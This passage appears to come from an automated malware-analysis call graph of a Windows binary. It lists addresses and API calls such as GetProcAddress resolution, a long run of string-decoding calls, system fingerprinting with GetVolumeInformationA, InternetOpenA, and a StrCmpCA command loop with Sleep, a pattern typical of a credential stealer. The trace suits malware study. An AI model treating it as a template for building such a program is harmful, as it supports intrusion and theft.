13736->13737 13739 865b1d 13738->13739 13740 86a740 lstrcpy 13739->13740 13741 865b2e 13740->13741 13974 86a820 lstrlen 13741->13974 13744 86a820 2 API calls 13745 865b64 13744->13745 13746 86a820 2 API calls 13745->13746 13747 865b74 13746->13747 13978 866430 13747->13978 13750 86a820 2 API calls 13751 865b93 13750->13751 13752 86a820 2 API calls 13751->13752 13753 865ba0 13752->13753 13754 86a820 2 API calls 13753->13754 13755 865bad 13754->13755 13756 86a820 2 API calls 13755->13756 13757 865bf9 13756->13757 13987 8526a0 13757->13987 13765 865cc3 13766 866430 lstrcpy 13765->13766 13767 865cd5 13766->13767 13768 86a7a0 lstrcpy 13767->13768 13769 865cf2 13768->13769 13770 86a9b0 4 API calls 13769->13770 13771 865d0a 13770->13771 13772 86a8a0 lstrcpy 13771->13772 13773 865d16 13772->13773 13774 86a9b0 4 API calls 13773->13774 13775 865d3a 13774->13775 13776 86a8a0 lstrcpy 13775->13776 13777 865d46 13776->13777 13778 86a9b0 4 API calls 13777->13778 13779 865d6a 13778->13779 13780 86a8a0 lstrcpy 13779->13780 13781 865d76 13780->13781 13782 86a740 lstrcpy 13781->13782 13783 865d9e 13782->13783 14713 867500 GetWindowsDirectoryA 13783->14713 13786 86a7a0 lstrcpy 13787 865db8 13786->13787 14723 854880 13787->14723 13789 865dbe 14869 8617a0 13789->14869 13791 865dc6 13792 86a740 lstrcpy 13791->13792 13793 865de9 13792->13793 13794 851590 lstrcpy 13793->13794 13795 865dfd 13794->13795 14885 855960 13795->14885 13797 865e03 15029 861050 13797->15029 13799 865e0e 13800 86a740 lstrcpy 13799->13800 13801 865e32 13800->13801 13802 851590 lstrcpy 13801->13802 13803 865e46 13802->13803 13804 855960 34 API calls 13803->13804 13805 865e4c 13804->13805 15033 860d90 13805->15033 13807 865e57 13808 86a740 lstrcpy 13807->13808 13809 865e79 13808->13809 13810 851590 lstrcpy 13809->13810 13811 865e8d 13810->13811 13812 855960 34 API calls 13811->13812 13813 865e93 13812->13813 15040 860f40 13813->15040 13815 865e9e 13816 851590 lstrcpy 13815->13816 13817 865eb5 13816->13817 15045 861a10 13817->15045 13819 865eba 13820 86a740 lstrcpy 13819->13820 13821 865ed6 13820->13821 15389 854fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13821->15389 13823 865edb 13824 851590 lstrcpy 13823->13824 13825 865f5b 13824->13825 15396 860740 13825->15396 13827 865f60 13828 86a740 lstrcpy 13827->13828 13829 865f86 13828->13829 13830 851590 lstrcpy 13829->13830 13831 865f9a 13830->13831 13832 855960 34 API calls 13831->13832 13833 865fa0 13832->13833 13927 8545d1 RtlAllocateHeap 13926->13927 13929 854621 VirtualProtect 13927->13929 13929->13575 13931->13662 13933 8510c2 ctype 13932->13933 13934 8510fd 13933->13934 13935 8510e2 VirtualFree 13933->13935 13934->13692 13935->13934 13937 851233 GlobalMemoryStatusEx 13936->13937 13937->13695 13938->13719 13940 86a7c2 13939->13940 13941 86a7ec 13940->13941 13942 86a7da lstrcpy 13940->13942 13941->13724 13942->13941 13944 86a740 lstrcpy 13943->13944 13945 866833 13944->13945 13946 86a9b0 4 API calls 13945->13946 13947 866845 13946->13947 13948 86a8a0 lstrcpy 13947->13948 13949 86684e 13948->13949 13950 86a9b0 4 API calls 13949->13950 13951 866867 13950->13951 13952 86a8a0 lstrcpy 13951->13952 13953 866870 13952->13953 13954 86a9b0 4 API calls 13953->13954 13955 86688a 13954->13955 13956 86a8a0 lstrcpy 13955->13956 13957 866893 13956->13957 13958 86a9b0 4 API calls 13957->13958 13959 8668ac 13958->13959 13960 86a8a0 lstrcpy 13959->13960 13961 8668b5 13960->13961 13962 86a9b0 4 API calls 13961->13962 13963 8668cf 13962->13963 13964 86a8a0 lstrcpy 13963->13964 13965 8668d8 13964->13965 13966 86a9b0 4 API calls 13965->13966 13967 8668f3 13966->13967 13968 86a8a0 lstrcpy 13967->13968 13969 8668fc 13968->13969 13970 86a7a0 lstrcpy 13969->13970 13971 866910 13970->13971 13971->13731 13973 86a812 13972->13973 13973->13734 13975 86a83f 13974->13975 13976 865b54 13975->13976 13977 86a87b lstrcpy 13975->13977 13976->13744 13977->13976 13979 86a8a0 lstrcpy 13978->13979 13980 866443 13979->13980 13981 86a8a0 lstrcpy 13980->13981 13982 866455 13981->13982 13983 86a8a0 lstrcpy 13982->13983 13984 866467 13983->13984 13985 86a8a0 lstrcpy 13984->13985 13986 865b86 13985->13986 13986->13750 13988 8545c0 2 API calls 13987->13988 13989 8526b4 13988->13989 13990 8545c0 2 API calls 13989->13990 13991 8526d7 13990->13991 13992 8545c0 2 API calls 13991->13992 13993 8526f0 13992->13993 13994 8545c0 2 API calls 13993->13994 13995 852709 13994->13995 13996 8545c0 2 API calls 13995->13996 13997 852736 13996->13997 13998 8545c0 2 API calls 13997->13998 13999 85274f 13998->13999 14000 8545c0 2 API calls 13999->14000 14001 852768 14000->14001 14002 8545c0 2 API calls 14001->14002 14003 852795 14002->14003 14004 8545c0 2 API calls 14003->14004 14005 8527ae 14004->14005 14006 8545c0 2 API calls 14005->14006 14007 8527c7 14006->14007 14008 8545c0 2 API calls 14007->14008 14009 8527e0 14008->14009 14010 8545c0 2 API calls 14009->14010 14011 8527f9 14010->14011 14012 8545c0 2 API calls 14011->14012 14013 852812 14012->14013 14014 8545c0 2 API calls 14013->14014 14015 85282b 14014->14015 14016 8545c0 2 API calls 14015->14016 14017 852844 14016->14017 14018 8545c0 2 API calls 14017->14018 14019 85285d 14018->14019 14020 8545c0 2 API calls 14019->14020 14021 852876 14020->14021 14022 8545c0 2 API calls 14021->14022 14023 85288f 14022->14023 14024 8545c0 2 API calls 14023->14024 14025 8528a8 14024->14025 14026 8545c0 2 API calls 14025->14026 14027 8528c1 14026->14027 14028 8545c0 2 API calls 14027->14028 14029 8528da 14028->14029 14030 8545c0 2 API calls 14029->14030 14031 8528f3 14030->14031 14032 8545c0 2 API calls 14031->14032 14033 85290c 14032->14033 14034 8545c0 2 API calls 14033->14034 14035 852925 14034->14035 14036 8545c0 2 API calls 14035->14036 14037 85293e 14036->14037 14038 8545c0 2 API calls 14037->14038 14039 852957 14038->14039 14040 8545c0 2 API calls 14039->14040 14041 852970 14040->14041 14042 8545c0 2 API calls 14041->14042 14043 852989 14042->14043 14044 8545c0 2 API calls 14043->14044 14045 8529a2 14044->14045 14046 8545c0 2 API calls 14045->14046 14047 8529bb 14046->14047 14048 8545c0 2 API calls 14047->14048 14049 8529d4 14048->14049 14050 8545c0 2 API calls 14049->14050 14051 8529ed 14050->14051 14052 8545c0 2 API calls 14051->14052 14053 852a06 14052->14053 14054 8545c0 2 API calls 14053->14054 14055 852a1f 14054->14055 14056 8545c0 2 API calls 14055->14056 14057 852a38 14056->14057 14058 8545c0 2 API calls 14057->14058 14059 852a51 14058->14059 14060 8545c0 2 API calls 14059->14060 14061 852a6a 14060->14061 14062 8545c0 2 API calls 14061->14062 14063 852a83 14062->14063 14064 8545c0 2 API calls 14063->14064 14065 852a9c 14064->14065 14066 8545c0 2 API calls 14065->14066 14067 852ab5 14066->14067 14068 8545c0 2 API calls 14067->14068 14069 852ace 14068->14069 14070 8545c0 2 API calls 14069->14070 14071 852ae7 14070->14071 14072 8545c0 2 API calls 14071->14072 14073 852b00 14072->14073 14074 8545c0 2 API calls 14073->14074 14075 852b19 14074->14075 14076 8545c0 2 API calls 14075->14076 14077 852b32 14076->14077 14078 8545c0 2 API calls 14077->14078 14079 852b4b 14078->14079 14080 8545c0 2 API calls 14079->14080 14081 852b64 14080->14081 14082 8545c0 2 API calls 14081->14082 14083 852b7d 14082->14083 14084 8545c0 2 API calls 14083->14084 14085 852b96 14084->14085 14086 8545c0 2 API calls 14085->14086 14087 852baf 14086->14087 14088 8545c0 2 API calls 14087->14088 14089 852bc8 14088->14089 14090 8545c0 2 API calls 14089->14090 14091 852be1 14090->14091 14092 8545c0 2 API calls 14091->14092 14093 852bfa 14092->14093 14094 8545c0 2 API calls 14093->14094 14095 852c13 14094->14095 14096 8545c0 2 API calls 14095->14096 14097 852c2c 14096->14097 14098 8545c0 2 API calls 14097->14098 14099 852c45 14098->14099 14100 8545c0 2 API calls 14099->14100 14101 852c5e 14100->14101 14102 8545c0 2 API calls 14101->14102 14103 852c77 14102->14103 14104 8545c0 2 API calls 14103->14104 14105 852c90 14104->14105 14106 8545c0 2 API calls 14105->14106 14107 852ca9 14106->14107 14108 8545c0 2 API calls 14107->14108 14109 852cc2 14108->14109 14110 8545c0 2 API calls 14109->14110 14111 852cdb 14110->14111 14112 8545c0 2 API calls 14111->14112 14113 852cf4 14112->14113 14114 8545c0 2 API calls 14113->14114 14115 852d0d 14114->14115 14116 8545c0 2 API calls 14115->14116 14117 852d26 14116->14117 14118 8545c0 2 API calls 14117->14118 14119 852d3f 14118->14119 14120 8545c0 2 API calls 14119->14120 14121 852d58 14120->14121 14122 8545c0 2 API calls 14121->14122 14123 852d71 14122->14123 14124 8545c0 2 API calls 14123->14124 14125 852d8a 14124->14125 14126 8545c0 2 API calls 14125->14126 14127 852da3 14126->14127 14128 8545c0 2 API calls 14127->14128 14129 852dbc 14128->14129 14130 8545c0 2 API calls 14129->14130 14131 852dd5 14130->14131 14132 8545c0 2 API calls 14131->14132 14133 852dee 14132->14133 14134 8545c0 2 API calls 14133->14134 14135 852e07 14134->14135 14136 8545c0 2 API calls 14135->14136 14137 852e20 14136->14137 14138 8545c0 2 API calls 14137->14138 14139 852e39 14138->14139 14140 8545c0 2 API calls 14139->14140 14141 852e52 14140->14141 14142 8545c0 2 API calls 14141->14142 14143 852e6b 14142->14143 14144 8545c0 2 API calls 14143->14144 14145 852e84 14144->14145 14146 8545c0 2 API calls 14145->14146 14147 852e9d 14146->14147 14148 8545c0 2 API calls 14147->14148 14149 852eb6 14148->14149 14150 8545c0 2 API calls 14149->14150 14151 852ecf 14150->14151 14152 8545c0 2 API calls 14151->14152 14153 852ee8 14152->14153 14154 8545c0 2 API calls 14153->14154 14155 852f01 14154->14155 14156 8545c0 2 API calls 14155->14156 14157 852f1a 14156->14157 14158 8545c0 2 API calls 14157->14158 14159 852f33 14158->14159 14160 8545c0 2 API calls 14159->14160 14161 852f4c 14160->14161 14162 8545c0 2 API calls 14161->14162 14163 852f65 14162->14163 14164 8545c0 2 API calls 14163->14164 14165 852f7e 14164->14165 14166 8545c0 2 API calls 14165->14166 14167 852f97 14166->14167 14168 8545c0 2 API calls 14167->14168 14169 852fb0 14168->14169 14170 8545c0 2 API calls 14169->14170 14171 852fc9 14170->14171 14172 8545c0 2 API calls 14171->14172 14173 852fe2 14172->14173 14174 8545c0 2 API calls 14173->14174 14175 852ffb 14174->14175 14176 8545c0 2 API calls 14175->14176 14177 853014 14176->14177 14178 8545c0 2 API calls 14177->14178 14179 85302d 14178->14179 14180 8545c0 2 API calls 14179->14180 14181 853046 14180->14181 14182 8545c0 2 API calls 14181->14182 14183 85305f 14182->14183 14184 8545c0 2 API calls 14183->14184 14185 853078 14184->14185 14186 8545c0 2 API calls 14185->14186 14187 853091 14186->14187 14188 8545c0 2 API calls 14187->14188 14189 8530aa 14188->14189 14190 8545c0 2 API calls 14189->14190 14191 8530c3 14190->14191 14192 8545c0 2 API calls 14191->14192 14193 8530dc 14192->14193 14194 8545c0 2 API calls 14193->14194 14195 8530f5 14194->14195 14196 8545c0 2 API calls 14195->14196 14197 85310e 14196->14197 14198 8545c0 2 API calls 14197->14198 14199 853127 14198->14199 14200 8545c0 2 API calls 14199->14200 14201 853140 14200->14201 14202 8545c0 2 API calls 14201->14202 14203 853159 14202->14203 14204 8545c0 2 API calls 14203->14204 14205 853172 14204->14205 14206 8545c0 2 API calls 14205->14206 14207 85318b 14206->14207 14208 8545c0 2 API calls 14207->14208 14209 8531a4 14208->14209 14210 8545c0 2 API calls 14209->14210 14211 8531bd 14210->14211 14212 8545c0 2 API calls 14211->14212 14213 8531d6 14212->14213 14214 8545c0 2 API calls 14213->14214 14215 8531ef 14214->14215 14216 8545c0 2 API calls 14215->14216 14217 853208 14216->14217 14218 8545c0 2 API calls 14217->14218 14219 853221 14218->14219 14220 8545c0 2 API calls 14219->14220 14221 85323a 14220->14221 14222 8545c0 2 API calls 14221->14222 14223 853253 14222->14223 14224 8545c0 2 API calls 14223->14224 14225 85326c 14224->14225 14226 8545c0 2 API calls 14225->14226 14227 853285 14226->14227 14228 8545c0 2 API calls 14227->14228 14229 85329e 14228->14229 14230 8545c0 2 API calls 14229->14230 14231 8532b7 14230->14231 14232 8545c0 2 API calls 14231->14232 14233 8532d0 14232->14233 14234 8545c0 2 API calls 14233->14234 14235 8532e9 14234->14235 14236 8545c0 2 API calls 14235->14236 14237 853302 14236->14237 14238 8545c0 2 API calls 14237->14238 14239 85331b 14238->14239 14240 8545c0 2 API calls 14239->14240 14241 853334 14240->14241 14242 8545c0 2 API calls 14241->14242 14243 85334d 14242->14243 14244 8545c0 2 API calls 14243->14244 14245 853366 14244->14245 14246 8545c0 2 API calls 14245->14246 14247 85337f 14246->14247 14248 8545c0 2 API calls 14247->14248 14249 853398 14248->14249 14250 8545c0 2 API calls 14249->14250 14251 8533b1 14250->14251 14252 8545c0 2 API calls 14251->14252 14253 8533ca 14252->14253 14254 8545c0 2 API calls 14253->14254 14255 8533e3 14254->14255 14256 8545c0 2 API calls 14255->14256 14257 8533fc 14256->14257 14258 8545c0 2 API calls 14257->14258 14259 853415 14258->14259 14260 8545c0 2 API calls 14259->14260 14261 85342e 14260->14261 14262 8545c0 2 API calls 14261->14262 14263 853447 14262->14263 14264 8545c0 2 API calls 14263->14264 14265 853460 14264->14265 14266 8545c0 2 API calls 14265->14266 14267 853479 14266->14267 14268 8545c0 2 API calls 14267->14268 14269 853492 14268->14269 14270 8545c0 2 API calls 14269->14270 14271 8534ab 14270->14271 14272 8545c0 2 API calls 14271->14272 14273 8534c4 14272->14273 14274 8545c0 2 API calls 14273->14274 14275 8534dd 14274->14275 14276 8545c0 2 API calls 14275->14276 14277 8534f6 14276->14277 14278 8545c0 2 API calls 14277->14278 14279 85350f 14278->14279 14280 8545c0 2 API calls 14279->14280 14281 853528 14280->14281 14282 8545c0 2 API calls 14281->14282 14283 853541 14282->14283 14284 8545c0 2 API calls 14283->14284 14285 85355a 14284->14285 14286 8545c0 2 API calls 14285->14286 14287 853573 14286->14287 14288 8545c0 2 API calls 14287->14288 14289 85358c 14288->14289 14290 8545c0 2 API calls 14289->14290 14291 8535a5 14290->14291 14292 8545c0 2 API calls 14291->14292 14293 8535be 14292->14293 14294 8545c0 2 API calls 14293->14294 14295 8535d7 14294->14295 14296 8545c0 2 API calls 14295->14296 14297 8535f0 14296->14297 14298 8545c0 2 API calls 14297->14298 14299 853609 14298->14299 14300 8545c0 2 API calls 14299->14300 14301 853622 14300->14301 14302 8545c0 2 API calls 14301->14302 14303 85363b 14302->14303 14304 8545c0 2 API calls 14303->14304 14305 853654 14304->14305 14306 8545c0 2 API calls 14305->14306 14307 85366d 14306->14307 14308 8545c0 2 API calls 14307->14308 14309 853686 14308->14309 14310 8545c0 2 API calls 14309->14310 14311 85369f 14310->14311 14312 8545c0 2 API calls 14311->14312 14313 8536b8 14312->14313 14314 8545c0 2 API calls 14313->14314 14315 8536d1 14314->14315 14316 8545c0 2 API calls 14315->14316 14317 8536ea 14316->14317 14318 8545c0 2 API calls 14317->14318 14319 853703 14318->14319 14320 8545c0 2 API calls 14319->14320 14321 85371c 14320->14321 14322 8545c0 2 API calls 14321->14322 14323 853735 14322->14323 14324 8545c0 2 API calls 14323->14324 14325 85374e 14324->14325 14326 8545c0 2 API calls 14325->14326 14327 853767 14326->14327 14328 8545c0 2 API calls 14327->14328 14329 853780 14328->14329 14330 8545c0 2 API calls 14329->14330 14331 853799 14330->14331 14332 8545c0 2 API calls 14331->14332 14333 8537b2 14332->14333 14334 8545c0 2 API calls 14333->14334 14335 8537cb 14334->14335 14336 8545c0 2 API calls 14335->14336 14337 8537e4 14336->14337 14338 8545c0 2 API calls 14337->14338 14339 8537fd 14338->14339 14340 8545c0 2 API calls 14339->14340 14341 853816 14340->14341 14342 8545c0 2 API calls 14341->14342 14343 85382f 14342->14343 14344 8545c0 2 API calls 14343->14344 14345 853848 14344->14345 14346 8545c0 2 API calls 14345->14346 14347 853861 14346->14347 14348 8545c0 2 API calls 14347->14348 14349 85387a 14348->14349 14350 8545c0 2 API calls 14349->14350 14351 853893 14350->14351 14352 8545c0 2 API calls 14351->14352 14353 8538ac 14352->14353 14354 8545c0 2 API calls 14353->14354 14355 8538c5 14354->14355 14356 8545c0 2 API calls 14355->14356 14357 8538de 14356->14357 14358 8545c0 2 API calls 14357->14358 14359 8538f7 14358->14359 14360 8545c0 2 API calls 14359->14360 14361 853910 14360->14361 14362 8545c0 2 API calls 14361->14362 14363 853929 14362->14363 14364 8545c0 2 API calls 14363->14364 14365 853942 14364->14365 14366 8545c0 2 API calls 14365->14366 14367 85395b 14366->14367 14368 8545c0 2 API calls 14367->14368 14369 853974 14368->14369 14370 8545c0 2 API calls 14369->14370 14371 85398d 14370->14371 14372 8545c0 2 API calls 14371->14372 14373 8539a6 14372->14373 14374 8545c0 2 API calls 14373->14374 14375 8539bf 14374->14375 14376 8545c0 2 API calls 14375->14376 14377 8539d8 14376->14377 14378 8545c0 2 API calls 14377->14378 14379 8539f1 14378->14379 14380 8545c0 2 API calls 14379->14380 14381 853a0a 14380->14381 14382 8545c0 2 API calls 14381->14382 14383 853a23 14382->14383 14384 8545c0 2 API calls 14383->14384 14385 853a3c 14384->14385 14386 8545c0 2 API calls 14385->14386 14387 853a55 14386->14387 14388 8545c0 2 API calls 14387->14388 14389 853a6e 14388->14389 14390 8545c0 2 API calls 14389->14390 14391 853a87 14390->14391 14392 8545c0 2 API calls 14391->14392 14393 853aa0 14392->14393 14394 8545c0 2 API calls 14393->14394 14395 853ab9 14394->14395 14396 8545c0 2 API calls 14395->14396 14397 853ad2 14396->14397 14398 8545c0 2 API calls 14397->14398 14399 853aeb 14398->14399 14400 8545c0 2 API calls 14399->14400 14401 853b04 14400->14401 14402 8545c0 2 API calls 14401->14402 14403 853b1d 14402->14403 14404 8545c0 2 API calls 14403->14404 14405 853b36 14404->14405 14406 8545c0 2 API calls 14405->14406 14407 853b4f 14406->14407 14408 8545c0 2 API calls 14407->14408 14409 853b68 14408->14409 14410 8545c0 2 API calls 14409->14410 14411 853b81 14410->14411 14412 8545c0 2 API calls 14411->14412 14413 853b9a 14412->14413 14414 8545c0 2 API calls 14413->14414 14415 853bb3 14414->14415 14416 8545c0 2 API calls 14415->14416 14417 853bcc 14416->14417 14418 8545c0 2 API calls 14417->14418 14419 853be5 14418->14419 14420 8545c0 2 API calls 14419->14420 14421 853bfe 14420->14421 14422 8545c0 2 API calls 14421->14422 14423 853c17 14422->14423 14424 8545c0 2 API calls 14423->14424 14425 853c30 14424->14425 14426 8545c0 2 API calls 14425->14426 14427 853c49 14426->14427 14428 8545c0 2 API calls 14427->14428 14429 853c62 14428->14429 14430 8545c0 2 API calls 14429->14430 14431 853c7b 14430->14431 14432 8545c0 2 API calls 14431->14432 14433 853c94 14432->14433 14434 8545c0 2 API calls 14433->14434 14435 853cad 14434->14435 14436 8545c0 2 API calls 14435->14436 14437 853cc6 14436->14437 14438 8545c0 2 API calls 14437->14438 14439 853cdf 14438->14439 14440 8545c0 2 API calls 14439->14440 14441 853cf8 14440->14441 14442 8545c0 2 API calls 14441->14442 14443 853d11 14442->14443 14444 8545c0 2 API calls 14443->14444 14445 853d2a 14444->14445 14446 8545c0 2 API calls 14445->14446 14447 853d43 14446->14447 14448 8545c0 2 API calls 14447->14448 14449 853d5c 14448->14449 14450 8545c0 2 API calls 14449->14450 14451 853d75 14450->14451 14452 8545c0 2 API calls 14451->14452 14453 853d8e 14452->14453 14454 8545c0 2 API calls 14453->14454 14455 853da7 14454->14455 14456 8545c0 2 API calls 14455->14456 14457 853dc0 14456->14457 14458 8545c0 2 API calls 14457->14458 14459 853dd9 14458->14459 14460 8545c0 2 API calls 14459->14460 14461 853df2 14460->14461 14462 8545c0 2 API calls 14461->14462 14463 853e0b 14462->14463 14464 8545c0 2 API calls 14463->14464 14465 853e24 14464->14465 14466 8545c0 2 API calls 14465->14466 14467 853e3d 14466->14467 14468 8545c0 2 API calls 14467->14468 14469 853e56 14468->14469 14470 8545c0 2 API calls 14469->14470 14471 853e6f 14470->14471 14472 8545c0 2 API calls 14471->14472 14473 853e88 14472->14473 14474 8545c0 2 API calls 14473->14474 14475 853ea1 14474->14475 14476 8545c0 2 API calls 14475->14476 14477 853eba 14476->14477 14478 8545c0 2 API calls 14477->14478 14479 853ed3 14478->14479 14480 8545c0 2 API calls 14479->14480 14481 853eec 14480->14481 14482 8545c0 2 API calls 14481->14482 14483 853f05 14482->14483 14484 8545c0 2 API calls 14483->14484 14485 853f1e 14484->14485 14486 8545c0 2 API calls 14485->14486 14487 853f37 14486->14487 14488 8545c0 2 API calls 14487->14488 14489 853f50 14488->14489 14490 8545c0 2 API calls 14489->14490 14491 853f69 14490->14491 14492 8545c0 2 API calls 14491->14492 14493 853f82 14492->14493 14494 8545c0 2 API calls 14493->14494 14495 853f9b 14494->14495 14496 8545c0 2 API calls 14495->14496 14497 853fb4 14496->14497 14498 8545c0 2 API calls 14497->14498 14499 853fcd 14498->14499 14500 8545c0 2 API calls 14499->14500 14501 853fe6 14500->14501 14502 8545c0 2 API calls 14501->14502 14503 853fff 14502->14503 14504 8545c0 2 API calls 14503->14504 14505 854018 14504->14505 14506 8545c0 2 API calls 14505->14506 14507 854031 14506->14507 14508 8545c0 2 API calls 14507->14508 14509 85404a 14508->14509 14510 8545c0 2 API calls 14509->14510 14511 854063 14510->14511 14512 8545c0 2 API calls 14511->14512 14513 85407c 14512->14513 14514 8545c0 2 API calls 14513->14514 14515 854095 14514->14515 14516 8545c0 2 API calls 14515->14516 14517 8540ae 14516->14517 14518 8545c0 2 API calls 14517->14518 14519 8540c7 14518->14519 14520 8545c0 2 API calls 14519->14520 14521 8540e0 14520->14521 14522 8545c0 2 API calls 14521->14522 14523 8540f9 14522->14523 14524 8545c0 2 API calls 14523->14524 14525 854112 14524->14525 14526 8545c0 2 API calls 14525->14526 14527 85412b 14526->14527 14528 8545c0 2 API calls 14527->14528 14529 854144 14528->14529 14530 8545c0 2 API calls 14529->14530 14531 85415d 14530->14531 14532 8545c0 2 API calls 14531->14532 14533 854176 14532->14533 14534 8545c0 2 API calls 14533->14534 14535 85418f 14534->14535 14536 8545c0 2 API calls 14535->14536 14537 8541a8 14536->14537 14538 8545c0 2 API calls 14537->14538 14539 8541c1 14538->14539 14540 8545c0 2 API calls 14539->14540 14541 8541da 14540->14541 14542 8545c0 2 API calls 14541->14542 14543 8541f3 14542->14543 14544 8545c0 2 API calls 14543->14544 14545 85420c 14544->14545 14546 8545c0 2 API calls 14545->14546 14547 854225 14546->14547 14548 8545c0 2 API calls 14547->14548 14549 85423e 14548->14549 14550 8545c0 2 API calls 14549->14550 14551 854257 14550->14551 14552 8545c0 2 API calls 14551->14552 14553 854270 14552->14553 14554 8545c0 2 API calls 14553->14554 14555 854289 14554->14555 14556 8545c0 2 API calls 14555->14556 14557 8542a2 14556->14557 14558 8545c0 2 API calls 14557->14558 14559 8542bb 14558->14559 14560 8545c0 2 API calls 14559->14560 14561 8542d4 14560->14561 14562 8545c0 2 API calls 14561->14562 14563 8542ed 14562->14563 14564 8545c0 2 API calls 14563->14564 14565 854306 14564->14565 14566 8545c0 2 API calls 14565->14566 14567 85431f 14566->14567 14568 8545c0 2 API calls 14567->14568 14569 854338 14568->14569 14570 8545c0 2 API calls 14569->14570 14571 854351 14570->14571 14572 8545c0 2 API calls 14571->14572 14573 85436a 14572->14573 14574 8545c0 2 API calls 14573->14574 14575 854383 14574->14575 14576 8545c0 2 API calls 14575->14576 14577 85439c 14576->14577 14578 8545c0 2 API calls 14577->14578 14579 8543b5 14578->14579 14580 8545c0 2 API calls 14579->14580 14581 8543ce 14580->14581 14582 8545c0 2 API calls 14581->14582 14583 8543e7 14582->14583 14584 8545c0 2 API calls 14583->14584 14585 854400 14584->14585 14586 8545c0 2 API calls 14585->14586 14587 854419 14586->14587 14588 8545c0 2 API calls 14587->14588 14589 854432 14588->14589 14590 8545c0 2 API calls 14589->14590 14591 85444b 14590->14591 14592 8545c0 2 API calls 14591->14592 14593 854464 14592->14593 14594 8545c0 2 API calls 14593->14594 14595 85447d 14594->14595 14596 8545c0 2 API calls 14595->14596 14597 854496 14596->14597 14598 8545c0 2 API calls 14597->14598 14599 8544af 14598->14599 14600 8545c0 2 API calls 14599->14600 14601 8544c8 14600->14601 14602 8545c0 2 API calls 14601->14602 14603 8544e1 14602->14603 14604 8545c0 2 API calls 14603->14604 14605 8544fa 14604->14605 14606 8545c0 2 API calls 14605->14606 14607 854513 14606->14607 14608 8545c0 2 API calls 14607->14608 14609 85452c 14608->14609 14610 8545c0 2 API calls 14609->14610 14611 854545 14610->14611 14612 8545c0 2 API calls 14611->14612 14613 85455e 14612->14613 14614 8545c0 2 API calls 14613->14614 14615 854577 14614->14615 14616 8545c0 2 API calls 14615->14616 14617 854590 14616->14617 14618 8545c0 2 API calls 14617->14618 14619 8545a9 14618->14619 14620 869c10 14619->14620 14621 86a036 8 API calls 14620->14621 14622 869c20 43 API calls 14620->14622 14623 86a146 14621->14623 14624 86a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14621->14624 14622->14621 14625 86a216 14623->14625 14626 86a153 8 API calls 14623->14626 14624->14623 14627 86a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14625->14627 14628 86a298 14625->14628 14626->14625 14627->14628 14629 86a337 14628->14629 14630 86a2a5 6 API calls 14628->14630 14631 86a344 9 API calls 14629->14631 14632 86a41f 14629->14632 14630->14629 14631->14632 14633 86a4a2 14632->14633 14634 86a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14632->14634 14635 86a4dc 14633->14635 14636 86a4ab GetProcAddress GetProcAddress 14633->14636 14634->14633 14637 86a515 14635->14637 14638 86a4e5 GetProcAddress GetProcAddress 14635->14638 14636->14635 14639 86a612 14637->14639 14640 86a522 10 API calls 14637->14640 14638->14637 14641 86a67d 14639->14641 14642 86a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14639->14642 14640->14639 14643 86a686 GetProcAddress 14641->14643 14644 86a69e 14641->14644 14642->14641 14643->14644 14645 86a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14644->14645 14646 865ca3 14644->14646 14645->14646 14647 851590 14646->14647 15767 851670 14647->15767 14650 86a7a0 lstrcpy 14651 8515b5 14650->14651 14652 86a7a0 lstrcpy 14651->14652 14653 8515c7 14652->14653 14654 86a7a0 lstrcpy 14653->14654 14655 8515d9 14654->14655 14656 86a7a0 lstrcpy 14655->14656 14657 851663 14656->14657 14658 865510 14657->14658 14659 865521 14658->14659 14660 86a820 2 API calls 14659->14660 14661 86552e 14660->14661 14662 86a820 2 API calls 14661->14662 14663 86553b 14662->14663 14664 86a820 2 API calls 14663->14664 14665 865548 14664->14665 14666 86a740 lstrcpy 14665->14666 14667 865555 14666->14667 14668 86a740 lstrcpy 14667->14668 14669 865562 14668->14669 14670 86a740 lstrcpy 14669->14670 14671 86556f 14670->14671 14672 86a740 lstrcpy 14671->14672 14711 86557c 14672->14711 14673 8652c0 25 API calls 14673->14711 14674 8651f0 20 API calls 14674->14711 14675 865643 StrCmpCA 14675->14711 14676 8656a0 StrCmpCA 14677 8657dc 14676->14677 14676->14711 14678 86a8a0 lstrcpy 14677->14678 14679 8657e8 14678->14679 14680 86a820 2 API calls 14679->14680 14682 8657f6 14680->14682 14681 865856 StrCmpCA 14683 865991 14681->14683 14681->14711 14684 86a820 2 API calls 14682->14684 14686 86a8a0 lstrcpy 14683->14686 14685 865805 14684->14685 14687 851670 lstrcpy 14685->14687 14688 86599d 14686->14688 14709 865811 14687->14709 14691 86a820 2 API calls 14688->14691 14689 86a740 lstrcpy 14689->14711 14690 86a820 lstrlen lstrcpy 14690->14711 14693 8659ab 14691->14693 14692 865a0b StrCmpCA 14695 865a16 Sleep 14692->14695 14696 865a28 14692->14696 14694 86a820 2 API calls 14693->14694 14698 8659ba 14694->14698 14695->14711 14699 86a8a0 lstrcpy 14696->14699 14697 86a7a0 lstrcpy 14697->14711 14700 851670 lstrcpy 14698->14700 14701 865a34 14699->14701 14700->14709 14702 86a820 2 API calls 14701->14702 14703 865a43 14702->14703 14704 86a820 2 API calls 14703->14704 14705 865a52 14704->14705 14707 851670 lstrcpy 14705->14707 14706 86578a StrCmpCA 14706->14711 14707->14709 14708 851590 lstrcpy 14708->14711 14709->13765 14710 86593f StrCmpCA 14710->14711 14711->14673 14711->14674 14711->14675 14711->14676 14711->14681 14711->14689 14711->14690 14711->14692 14711->14697 14711->14706 14711->14708 14711->14710 14712 86a8a0 lstrcpy 14711->14712 14712->14711 14714 867553 GetVolumeInformationA 14713->14714 14715 86754c 14713->14715 14716 867591 14714->14716 14715->14714 14717 8675fc GetProcessHeap RtlAllocateHeap 14716->14717 14718 867628 wsprintfA 14717->14718 14719 867619 14717->14719 14720 86a740 lstrcpy 14718->14720 14721 86a740 lstrcpy 14719->14721 14722 865da7 14720->14722 14721->14722 14722->13786 14724 86a7a0 lstrcpy 14723->14724 14725 854899 14724->14725 15776 8547b0 14725->15776 14727 8548a5 14728 86a740 lstrcpy 14727->14728 14729 8548d7 14728->14729 14730 86a740 lstrcpy 14729->14730 14731 8548e4 14730->14731 14732 86a740 lstrcpy 14731->14732 14733 8548f1 14732->14733 14734 86a740 lstrcpy 14733->14734 14735 8548fe 14734->14735 